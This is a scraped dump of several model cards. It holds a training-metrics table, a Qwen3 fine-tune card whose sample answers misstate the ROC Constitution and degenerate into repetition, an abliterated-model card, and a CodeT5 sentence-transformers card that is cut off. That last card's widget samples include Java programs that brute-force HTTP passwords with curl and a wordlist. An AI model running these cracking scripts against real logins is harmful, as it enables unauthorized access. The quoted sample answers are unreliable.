| 0.3056        | 6.5292 | 1900 | 0.3608          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.2803        | 6.8729 | 2000 | 0.3663          | 0.8847   | 0.8846   | 0.8846      | 0.8853          | 0.8847       | 0.8853             | 0.8847          |
| 0.312         | 7.2165 | 2100 | 0.3665          | 0.8864   | 0.8863   | 0.8863      | 0.8872          | 0.8864       | 0.8872             | 0.8864          |
| 0.3847        | 7.5601 | 2200 | 0.3659          | 0.8847   | 0.8846   | 0.8846      | 0.8853          | 0.8847       | 0.8853             | 0.8847          |
| 0.324         | 7.9038 | 2300 | 0.3662          | 0.8847   | 0.8846   | 0.8846      | 0.8853          | 0.8847       | 0.8853             | 0.8847          |
| 0.3489        | 8.2474 | 2400 | 0.3643          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.3097        | 8.5911 | 2500 | 0.3647          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.2928        | 8.9347 | 2600 | 0.3653          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.365         | 9.2784 | 2700 | 0.3655          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.2417        | 9.6220 | 2800 | 0.3655          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.2933        | 9.9656 | 2900 | 0.3655          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |

### Framework versions

- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 2.14.4
- Tokenizers 0.21.1
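The card reports metrics but no usage example; a minimal hedged sketch with the `transformers` pipeline follows. The sample sentence is illustrative Indonesian social-media text ("This product is really good, fast delivery!"), and the label names depend on how the fine-tuned config was saved.

```python
from transformers import pipeline

# Load the fine-tuned sentiment classifier from the Hub.
classifier = pipeline(
    "text-classification",
    model="johannawawi/model-for-sosmed-analysis-v3",
)

# Returns a list like [{"label": ..., "score": ...}]; labels come from the model config.
print(classifier("Produk ini bagus banget, pengirimannya cepat!"))
```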
CSLin3303/qwen3-20250611002
CSLin3303
2025-06-11T10:41:06Z
0
0
null
[ "gguf", "qwen3", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:11:34Z
This model was trained from unsloth/Qwen3-14B-Base-unsloth-bnb-4bit, without any reasoning-mode data. The training results are poor. Sample responses:

Q: Please describe the content of Article 5 of the Constitution of the Republic of China.

A: In addition, how should matters be resolved when the machinery of state runs poorly or disputes arise?

Article 5 of the ROC Constitution provides: "The power to interpret this Constitution belongs to the Council of Grand Justices of the Judicial Yuan." This means that when the Constitution is read differently or disputed, the final power of interpretation rests with the council formed by the Grand Justices chosen by the Judicial Yuan.

As for cases where the machinery of state runs poorly or disputes arise, they should be handled through legal procedures. Specifically:

1. **Administrative disputes**: Conflicts between government agencies are usually first resolved through internal coordination; if no consensus is reached, a petition or administrative litigation may be filed under the Administrative Litigation Act.
2. **Legislative disputes**: Questions about drafting or amending laws should be fully discussed and debated within the Legislative Yuan. Joint committee meetings may be convened when necessary, inviting representatives of the relevant ministries, in order to reach consensus.
3. **Judicial review**: When an administrative or legislative act is suspected of violating the Constitution, a constitutional interpretation may be requested from the Grand Justices of the Judicial Yuan. If, after interpretation, the provision is found to contradict the spirit of the Constitution, it must be amended.

Through these mechanisms, democratic operation, stable national development, and social order and harmony are safeguarded.

Q: "All ethnic groups of the Republic of China are equal." Which article of the ROC Constitution

A: does this provision belong to, and how should it be interpreted?

This statement comes from Article 7 of the ROC Constitution: "The state referred to in this Constitution means the entire political entity including its territory, people, and government." Although this does not directly mention that all ethnic groups are equal, it rests on the spirit of that sentence: that every person should be respected and protected, no matter which ethnic group or cultural background they belong to.

Therefore, Article 7 of the ROC Constitution implies that everyone living in our country (regardless of race, gender, or other factors) enjoys the same rights and freedoms. In other words, the friends who live, work, study, and play together in this community should mutually respect, understand, tolerate, support, help, encourage, share, cherish, trust, friendship, cooperation, innovation, progress, safety, happiness, health, joy, growth, success, realize ideals and dreams, pursue a better life

---

---
base_model: unsloth/Qwen3-14B-Base-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- gguf
license: apache-2.0
language:
- en
---

# Uploaded model

- **Developed by:** CSLin3303
- **License:** apache-2.0
- **Finetuned from model:** unsloth/Qwen3-14B-Base-unsloth-bnb-4bit

This Qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
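Since the repository ships GGUF weights, a hedged loading sketch with `llama-cpp-python` follows. The quant filename below is a hypothetical placeholder, not confirmed against the repo; check the repository's file listing for the actual name.

```python
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

# Hypothetical filename -- verify against the repository's file list before use.
gguf_path = hf_hub_download(
    repo_id="CSLin3303/qwen3-20250611002",
    filename="qwen3-20250611002.Q4_K_M.gguf",  # assumption, not confirmed
)

# Load the quantized model; n_ctx is an illustrative context size.
llm = Llama(model_path=gguf_path, n_ctx=4096)
print(llm("請描述中華民國憲法第7條的內容?", max_tokens=128)["choices"][0]["text"])
```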
Triangle104/Homunculus-abliterated-Q4_K_S-GGUF
Triangle104
2025-06-11T10:41:06Z
0
0
transformers
[ "transformers", "gguf", "distillation", "/think", "/nothink", "reasoning-transfer", "arcee-ai", "chat", "abliterated", "uncensored", "llama-cpp", "gguf-my-repo", "en", "base_model:huihui-ai/Homunculus-abliterated", "base_model:quantized:huihui-ai/Homunculus-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T10:40:33Z
---
language:
- en
license: apache-2.0
library_name: transformers
base_model: huihui-ai/Homunculus-abliterated
tags:
- distillation
- /think
- /nothink
- reasoning-transfer
- arcee-ai
- chat
- abliterated
- uncensored
- llama-cpp
- gguf-my-repo
extra_gated_prompt: '**Usage Warnings** “**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering has been significantly reduced, potentially generating sensitive, controversial, or inappropriate content. Users should exercise caution and rigorously review generated outputs. “**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s outputs may be inappropriate for public settings, underage users, or applications requiring high security. “**Legal and Ethical Responsibilities**“: Users must ensure their usage complies with local laws and ethical standards. Generated content may carry legal or ethical risks, and users are solely responsible for any consequences. “**Research and Experimental Use**“: It is recommended to use this model for research, testing, or controlled environments, avoiding direct use in production or public-facing commercial applications. “**Monitoring and Review Recommendations**“: Users are strongly advised to monitor model outputs in real-time and conduct manual reviews when necessary to prevent the dissemination of inappropriate content. “**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone rigorous safety optimization. huihui.ai bears no responsibility for any consequences arising from its use.'
---

# Triangle104/Homunculus-abliterated-Q4_K_S-GGUF

This model was converted to GGUF format from [`huihui-ai/Homunculus-abliterated`](https://huggingface.co/huihui-ai/Homunculus-abliterated) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/Homunculus-abliterated) for more details on the model.

## Use with llama.cpp

Install llama.cpp through brew (works on Mac and Linux)

```bash
brew install llama.cpp
```

Invoke the llama.cpp server or the CLI.

### CLI:
```bash
llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is"
```

### Server:
```bash
llama-server --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -c 2048
```

Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.

Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```

Step 2: Move into the llama.cpp folder and build it with the `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```

Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Triangle104/Homunculus-abliterated-Q4_K_S-GGUF --hf-file homunculus-abliterated-q4_k_s.gguf -c 2048
```
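The card covers the llama.cpp CLI and server; for Python callers, here is a hedged equivalent using `llama-cpp-python`'s `from_pretrained` helper. The repo and file names come from the commands above; the context size and prompt are illustrative, and chat formatting is left to the library's defaults.

```python
from llama_cpp import Llama

# Pull the quant directly from the Hub and load it (requires huggingface_hub).
llm = Llama.from_pretrained(
    repo_id="Triangle104/Homunculus-abliterated-Q4_K_S-GGUF",
    filename="homunculus-abliterated-q4_k_s.gguf",
    n_ctx=2048,  # matches the -c 2048 used in the server example above
)

out = llm.create_chat_completion(
    messages=[{"role": "user", "content": "The meaning to life and the universe is"}],
    max_tokens=128,
)
print(out["choices"][0]["message"]["content"])
```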
buelfhood/SOCO-Java-CodeT5Small-ST
buelfhood
2025-06-11T10:39:12Z
0
0
sentence-transformers
[ "sentence-transformers", "safetensors", "t5", "sentence-similarity", "feature-extraction", "generated_from_trainer", "dataset_size:33411", "loss:BatchAllTripletLoss", "arxiv:1908.10084", "arxiv:1703.07737", "base_model:Salesforce/codet5-small", "base_model:finetune:Salesforce/codet5-small", "autotrain_compatible", "endpoints_compatible", "region:us" ]
sentence-similarity
2025-06-11T10:38:58Z
--- tags: - sentence-transformers - sentence-similarity - feature-extraction - generated_from_trainer - dataset_size:33411 - loss:BatchAllTripletLoss base_model: Salesforce/codet5-small widget: - source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\ \npublic class WatchDog extends TimerTask{\n\n private static URL location;\n\ \ private static String email;\n private static int checktime;\n private static\ \ Timer timer = new Timer();\n private BufferedReader input;\n private File\ \ checksumFile = new File(\"chksum.txt\");\n private File temp0000File = new\ \ File(\"temp0000\");\n private File kept0000File = new File(\"kept0000\");\n\ \n \n\n public WatchDog(){\n timer.schedule(this, new Date(), checktime);\n\ \ }\n\n\n \n\n public void run(){\n Vector imageFiles = new\ \ Vector();\n Vector diffImages = new Vector();\n try {\n \ \ System.out.println(\" Time: \".concat(new Date().toString()));\n \ \ System.out.println(\"Retreiving File\");\n \n input = new\ \ BufferedReader(new InputStreamReader\n (location.openStream()));\n\ \ \n BufferedWriter outputFile = new BufferedWriter\n \ \ (new FileWriter(temp0000File));\n String line = input.readLine();\n\ \ while (line != null) {\n StringBuffer imageFileName = new\ \ StringBuffer();\n if (scanForImages(line, imageFileName)) {\n \ \ String imageFile = new String(imageFileName);\n System.out.println(\"\ Detected image: \".concat(imageFile));\n try {\n imageFiles.add(new\ \ URL(imageFile));\n }\n catch (MalformedURLException\ \ e) {\n System.out.println(\"Image file detected. URL is malformed\"\ );\n }\n }\n outputFile.write(line);\n \ \ outputFile.write(\"\\n\");\n line = input.readLine();\n \ \ }\n input.print();\n outputFile.flush();\n \ \ outputFile.print();\n System.out.println(\" File Retreived\");\n \ \ if (!imageFiles.isEmpty()) {\n checkImages(imageFiles, diffImages);\n\ \ }\n if (!checksumFile.exists()) {\n generateChecksum(temp0000File.getName(),\ \ checksumFile);\n }\n else {\n if (!checksumOk(checksumFile))\ \ {\n reportDifferences(true, temp0000File, kept0000File, diffImages);\n\ \ generateChecksum(temp0000File.getName(), checksumFile);\n \ \ }\n else if (!diffImages.isEmpty()){\n reportDifferences(false,\ \ null, null, diffImages);\n }\n }\n\n \n \ \ temp0000File.renameTo(kept0000File);\n System.out.println(\"End Time:\ \ \".concat(new Date().toString()));\n }\n catch (MalformedURLException\ \ e) {\n e.printStackTrace();\n }\n catch (ConnectException\ \ e) {\n System.out.println(\"Failed connect\");\n System.exit(-1);\n\ \ }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n\n \n\n public boolean\ \ scanForImages(String line, StringBuffer imageFileName) {\n \n \ \ \n String lineIgnoreCase = line.toLowerCase();\n int imgPos =\ \ lineIgnoreCase.indexOf(\"<img \");\n if ( imgPos != -1 ){\n \ \ int srcPos = lineIgnoreCase.indexOf(\"src\", imgPos);\n int bracketPos\ \ = lineIgnoreCase.indexOf(\">\", imgPos);\n if (srcPos != -1 && bracketPos\ \ != -1 && srcPos < bracketPos) {\n int quote1Pos = lineIgnoreCase.indexOf(\"\ \\\"\", srcPos);\n int quote2Pos = lineIgnoreCase.indexOf(\"\\\"\"\ , quote1Pos+1);\n if (quote1Pos != -1 && quote2Pos != -1 &&\n \ \ quote1Pos < quote2Pos && quote2Pos < bracketPos) {\n \ \ \n imageFileName.append(line.substring(quote1Pos + 1,\n \ \ quote2Pos));\n if (imageFileName.indexOf(\"//\") == -1\ \ ) {\n \n String URLName = location.toString();\n\ \ int slashPos = URLName.lastIndexOf(\"/\");\n URLName\ \ = URLName.substring(0, slashPos);\n String HostName 
= \"http://\"\ .concat(location.getHost());\n if (imageFileName.indexOf(\"//\"\ ) == 0) {\n \n }\n else if (imageFileName.charAt(0)\ \ != '/') {\n \n imageFileName.insert(0, URLName.concat(\"\ /\"));\n }\n else {\n \n \ \ imageFileName.insert(0, HostName);\n }\n \ \ }\n return true;\n }\n }\n }\n \ \ return false;\n }\n\n \n\n public void checkImages(Vector\ \ imageFiles, Vector diffImages)\n throws IOException{\n System.out.println(\"\ Retrieving image \");\n Enumeration imageFilesEnumeration = imageFiles.elements();\n\ \ while (imageFilesEnumeration.hasMoreElements()) {\n URL url\ \ = (URL)imageFilesEnumeration.nextElement();\n try {\n BufferedInputStream\ \ imageInput = new BufferedInputStream\n (url.openStream());\n\ \ String localFile = url.getFile();\n \n \n \ \ \n \n \n int slashPosition = localFile.lastIndexOf(\"\ /\");\n if (slashPosition != -1) {\n localFile = localFile.substring(slashPosition+1);\n\ \ }\n System.out.println(\"Retrieving image file: \".concat(localFile));\n\ \ BufferedOutputStream imageOutput = new BufferedOutputStream\n \ \ (new FileOutputStream(localFile));\n byte bytes[] = new\ \ byte[10000];\n int noBytes = imageInput.get(bytes);\n \ \ while (noBytes != -1) {\n imageOutput.write(bytes, 0, noBytes );\n\ \ noBytes = imageInput.print(bytes);\n }\n \ \ File imageChecksumFile = new File(localFile.concat(\".chksum.txt\"));\n \ \ if (!imageChecksumFile.exists()) {\n generateChecksum(localFile,\ \ imageChecksumFile);\n }\n else {\n if (!checksumOk(imageChecksumFile))\ \ {\n diffImages.add(localFile);\n generateChecksum(localFile,\ \ imageChecksumFile);\n }\n }\n }\n \ \ catch (FileNotFoundException e) {\n System.out.println(\"Unable \ \ locate URL: \".concat(url.toString()));\n }\n }\n }\n\n\ \ \n\n public void generateChecksum(String inputFile, File checksum){\n\ \ try {\n System.out.println(\"Generating new checksum for \"\ .concat(inputFile));\n \n Process process = Runtime.getRuntime().exec(\"\ md5sum \".\n concat(inputFile));\n\ \ BufferedReader execCommand = new BufferedReader(new\n \ \ InputStreamReader((process.getInputStream())));\n BufferedWriter outputFile\ \ = new\n BufferedWriter(new FileWriter(checksum));\n String\ \ line = execCommand.readLine();\n while (line != null) {\n \ \ outputFile.write(line);\n outputFile.write(\"\\n\");\n \ \ line = execCommand.readLine();\n }\n outputFile.flush();\n\ \ outputFile.print();\n System.out.println(\"Checksum produced\"\ );\n }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n\n \n\n public boolean\ \ checksumOk(File chksumFile){\n try {\n System.out.println(\"\ Comparing checksums using \".concat(chksumFile\n ,e.getName()));\n\ \ \n Process process = Runtime.getRuntime().\n \ \ exec(\"md5sum --check \".concat(chksumFile.getName()));\n BufferedReader\ \ execCommand = new BufferedReader(new\n InputStreamReader( (process.getInputStream())));\n\ \ String line = execCommand.readLine();\n if (line.indexOf(\"\ : OK\") != -1) {\n System.out.println(\" the same\");\n \ \ return true;\n }\n }\n catch (IOException e) {\n \ \ e.printStackTrace();\n System.exit(-1);\n }\n System.out.println(\"\ Differences Found\");\n return false;\n }\n\n \n\n public\ \ void reportDifferences(boolean diffsFound, File file1, File file2,\n \ \ Vector images){\n try {\n System.out.println(\"\ Generating difference report\");\n \n Socket emailConnection\ \ = new Socket(\"yallara.cs.rmit.edu.\", 25);\n BufferedWriter emailOutStream\ \ = new BufferedWriter\n (new 
OutputStreamWriter(emailConnection.getOutputStream()));\n\ \ BufferedReader emailInStream = new BufferedReader\n (new\ \ InputStreamReader(emailConnection.getInputStream()));\n String line\ \ = emailInStream.readLine();\n System.out.println(line);\n \ \ if (!line.startsWith(\"220\")) {\n System.out.println\n \ \ (\" error occured connecting email server. Cannot send email.\");\n\ \ }\n else {\n \n \n emailOutStream.write(\"\ HELO yallara.cs.rmit.edu.\");\n emailOutStream.newLine();\n \ \ emailOutStream.flush();\n line = emailInStream.readLine();\n\ \ System.out.println(line);\n if (!line.startsWith(\"250\"\ )) {\n System.out.println\n (\" error occured\ \ connecting email server. Cannot send email.\");\n }\n \ \ else {\n emailOutStream.write(\"MAIL FROM: [email protected].\"\ );\n emailOutStream.newLine();\n emailOutStream.flush();\n\ \ line = emailInStream.readLine();\n System.out.println(line);\n\ \ if (!line.startsWith(\"250\")) {\n System.out.println\n\ \ (\" error occured sending email. Cannot send email.\");\n\ \ }\n else {\n emailOutStream.write(\"\ RCPT : \".concat(email));\n emailOutStream.newLine();\n \ \ emailOutStream.flush();\n line = emailInStream.readLine();\n\ \ System.out.println(line);\n if (!line.startsWith(\"\ 250\")) {\n System.out.println\n (\" error\ \ occured sending email. Cannot send email.\");\n }\n \ \ else {\n emailOutStream.write(\"DATA\");\n \ \ emailOutStream.newLine();\n emailOutStream.flush();\n\ \ line = emailInStream.readLine();\n System.out.println(line);\n\ \ if (!line.startsWith(\"354\")) {\n System.out.println\n\ \ (\" error occured sending email. Cannot send email.\"\ );\n }\n emailOutStream.newLine();\n\n \ \ if (!images.isEmpty()) {\n emailOutStream.write\n\ \ (\"Differences were found in the following image \"\ );\n emailOutStream.newLine();\n Enumeration\ \ e = images.elements();\n while (e.hasMoreElements()) {\n\ \ String s = (String) e.nextElement();\n \ \ emailOutStream.write(s);\n emailOutStream.newLine();\n\ \ }\n emailOutStream.newLine();\n \ \ }\n\n if (diffsFound) {\n \ \ \n String command = \"diff \".concat(file1.getName().concat(\"\ \ \")\n .concat(file2.getName()));\n\ \ Process process = Runtime.getRuntime().exec(command);\n \ \ BufferedReader execCommand = new BufferedReader\n \ \ (new InputStreamReader( (process.getInputStream())));\n \ \ line = execCommand.readLine();\n emailOutStream.write(\"\ Diffences found in file\");\n emailOutStream.newLine();\n\ \ while (line != null) {\n System.out.println(line);\n\ \ emailOutStream.write(line);\n emailOutStream.newLine();\n\ \ line = execCommand.readLine();\n }\n\ \ }\n\n \n emailOutStream.newLine();\n\ \ emailOutStream.write(\".\");\n emailOutStream.newLine();\n\ \ emailOutStream.flush();\n line = emailInStream.readLine();\n\ \ System.out.println(line);\n if (!line.startsWith(\"\ 250\")) {\n System.out.println\n (\"\ \ error occured sending email. 
Cannot send email.\");\n }\n \ \ else {\n emailOutStream.write(\"QUIT\");\n\ \ emailOutStream.newLine();\n emailOutStream.flush();\n\ \ System.out.println(emailInStream.readLine());\n \ \ }\n }\n }\n }\n }\n\ \ }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n\n\n \n\n public static\ \ void main(String args[]) {\n if (args.length != 3) {\n System.out.println(\"\ Usage: java WatchDog url email checktime(hours)\");\n System.exit(-1);\n\ \ }\n try {\n location = new URL(args[0]);\n }\n catch\ \ (MalformedURLException e) {\n e.printStackTrace();\n }\n email\ \ = new String().concat(args[1]);\n checktime = Integer.parseInt(args[2])\ \ * 60 * 60 * 1000;\n new WatchDog();\n }\n}\n" sentences: - "\n\nimport java.net.*;\nimport java.io.*;\n\nimport java.*;\nimport java.util.*;\n\ \npublic class Dictionary {\n\n private static String commandLine = \"curl http://sec-crack.cs.rmit.edu./SEC/2/index.php\ \ -I -u :\";\n private String password; \n private String previous;\ \ \n private String url; \n private int startTime;\n\ \ private int endTime;\n private int totalTime;\n private float averageTime;\n\ \ private boolean finish;\n private Process curl;\n private BufferedReader\ \ bf, responseLine;\n\n public Dictionary() {\n\n first();\n finish = true;\ \ \n previous = \"\"; \n\ \ Runtime run = Runtime.getRuntime();\n startTime =new Date().getTime(); \ \ \n int i=0;\n try {\n try {\n bf = new BufferedReader(new FileReader(\"\ words\"));\n }\n catch(FileNotFoundException notFound) {\n bf = new BufferedReader(new\ \ FileReader(\"/usr/share/lib/dict/words\"));\n }\n\n while((password = bf.readLine())\ \ != null) {\n if(password.length()>3) password = password.substring(0,3);\n\ \ if(previous.equals(password)) ;\n else {\n previous = password;\n \ \ url = commandLine+password;\n curl= run.exec(url); \n\ \ responseLine=new BufferedReader(new InputStreamReader(curl.getInputStream()));\n\ \ \n if(responseLine.readLine().substring(9,12).equals(\"200\")) break;\n\ \ }\n }\n }\n catch(IOException ioe) {\n System.out.println(\"\\n IO\ \ Exception! 
\\n\");\n System.out.println(\"The current url is:\"+ url);\n\ \ System.out.println(\"The current trying password is:\"+password);\n finish=false;\n\ \ }\n\n endTime = new Date().getTime(); \n totalTime = (endTime-startTime)/1000;\n\ \ System.out.println(\" The response time is:\"+ totalTime + \" seconds\\\ n\");\n if(finish) {\n System.out.println(\" The password for is:\"+ password);\n\ \ try {\n savePassword(password, totalTime);\n }\n catch (IOException\ \ ioec) {\n System.out.println(\" not save the password file Dictionary_pwd.txt\ \ \");\n }\n }\n }\n\n\n public void savePassword(String passwdString, int\ \ time) throws IOException {\n DataOutputStream outputStream = new DataOutputStream(new\ \ FileOutputStream(\"Dictionary_pwd.txt\"));\n outputStream.writeChars(\"The\ \ password is:\");\n outputStream.writeChars(passwdString+\"\\n\");\n outputStream.writeChars(\"\ The response time is: \");\n outputStream.writeChars(sw.toString(time));\n outputStream.writeChars(\"\ \ seconds\\n\");\n outputStream.close();\n }\n\n public void first() {\n\n\ \ System.out.println(\"\\n\\n----------------------------------------------\"\ );\n System.out.println(\" Use curl command and dictionary \");\n System.out.println(\"\ \ Brute Force the password for user \");\n System.out.println(\"----------------------------------------------\"\ );\n }\n\n public static void main(String[] args) {\n new Dictionary();\n\ \ } \n}\n" - "\n\nimport java.io.*;\nimport java.*;\nimport java.net.*;\nimport java.util.*;\n\ \npublic class WatchDog {\n public static void main (String[] args) throws IOException\ \ {\n BufferedReader stdin = new BufferedReader (new InputStreamReader(System.in));\n\ \ try{\n twentyfourhours = 86400000;\n Timer timer = new Timer();\n \ \ final Runtime rt = Runtime.getRuntime();\n\n try{\n Process wg1 = rt.exec(\"\ ./.sh\");\n wg1.waitFor();\n }\n catch(InterruptedException e ){\n \ \ System.err.println();\n e.printStackTrace();\n }\n\n class RepeatTask\ \ extends TimerTask{\n public void run(){\n try{\n Process wg2\ \ = rt.exec(\"./task.sh\");\n wg2.waitFor();\n FileReader fr = new\ \ FileReader(\"check.txt\");\n BufferedReader bufr = new BufferedReader(fr);\n\ \ String check = bufr.readLine();\n if(check.equals(\".txt: FAILED\"\ )) {\n Process difftosend = rt.exec(\"./diff.sh\");\n difftosend.waitFor();\n\ \ Process reset = rt.exec(\"./.sh\");\n reset.waitFor();\n \ \ }\n FileReader fr2 = new FileReader(\"imgdiffs.txt\");\n BufferedReader\ \ bufr2 = new BufferedReader(fr2);\n String imdiff = bufr2.readLine();\n\ \ if(imdiff != null){\n Process imdifftosend = rt.exec(\"./img.sh\"\ );\n imdifftosend.waitFor();\n Process reset = rt.exec(\"./.sh\"\ );\n reset.waitFor();\n }\n }\n catch(InterruptedException\ \ e){System.err.println();e.printStackTrace();}\n catch(IOException e){\n\ \ System.err.println(e);\n e.printStackTrace();\n }\n }}\n\ \n timer.scheduleAtFixedRate(new RepeatTask(),twentyfourhours,twentyfourhours);\n\ \ \n }\n catch(IOException e){\n System.err.println(e);\n e.printStackTrace();\n\ \ }\n \n}}\n" - "\n\nimport java.net.*;\nimport java.text.*; \nimport java.util.*; \nimport\ \ java.io.*;\n\npublic class WatchDog {\n\n public WatchDog() {\n\n StringBuffer\ \ stringBuffer1 = new StringBuffer();\n StringBuffer stringBuffer2 = new StringBuffer();\n\ \ int i,j = 0;\n\n try{\n\n URL yahoo = new URL(\"http://www.cs.rmit.edu./students/\"\ ); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n String inputLine = \"\";\n String inputLine1 = \"\";\n 
String\ \ changedtext= \"\";\n String changedflag= \"\";\n\n\n Thread.sleep(180);\n\ \n BufferedReader in1 = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n\ \n\n while ((inputLine = in.readLine()) != null) {\n inputLine1\ \ = in1.readLine();\n if (inputLine.equals(inputLine1)) {\n \ \ System.out.println(\"equal\");\n }\n else {\n \ \ System.out.println(\"Detected a Change\");\n System.out.println(\"\ Line Before the change:\" + inputLine);\n System.out.println(\"Line\ \ After the change:\" + inputLine1);\n changedtext = changedtext\ \ + inputLine + inputLine1;\n changedflag = \"Y\";\n }\n\ \ \n }\n\n if (in1.readLine() != null ) {\n System.out.println(\"\ Detected a Change\");\n System.out.println(\"New Lines Added \");\n \ \ changedtext = changedtext + \"New Lines added\";\n changedflag\ \ = \"Y\";\n }\n\n in.print();\n in1.print();\n\n if (changedflag.equals(\"\ Y\")) {\n String smtphost =\"smtp.mail.rmit.edu.\" ; \n String\ \ from = \"@rmit.edu.\"; \n String = \"janaka1@optusnet..\" ; \n \ \ }\n\n\n }\n catch(Exception e){ System.out.println(\"exception:\" + e);}\n\ \t \n}\n\t\t\n public static void main (String[] args) throws Exception {\n\ \t\tWatchDog u = new WatchDog();\n }\n}\n" - source_sentence: "\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\n\ import java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private\ \ URL url;\n private HttpURLConnection connection ;\n private int stopTime\ \ = 0;\n private int startTime = 0;\n private int count = 0;\n\n public\ \ BruteForce()\n {\n System.out.println(\"Process is running...\");\n \ \ startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n\ \ }\n\n public static void main (String args[])\n {\n BruteForce bf\ \ = new BruteForce();\n }\n \n public void threeLetters()\n {\n String\ \ s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n\ \ {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for\ \ (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0]\ \ + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\ \ + i2));\n decision(s1);\n count++;\n\n \ \ s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1))\ \ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\ \ +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\ \ + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase()\ \ +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n\ \ count++;\n\n s1 = (String.valueOf((char)(a[0] +\ \ i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2]\ \ + i2));\n decision(s1);\n count++;\n\n \ \ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1]\ \ + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n\ \ decision(s1);\n count++;\n\n s1 =\ \ (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1]\ \ + i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n\ \ count++;\n }\n }\n }\n }\n \n public\ \ void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n\ \ for (int i0 = 0; i0 < 26; i0++)\n 
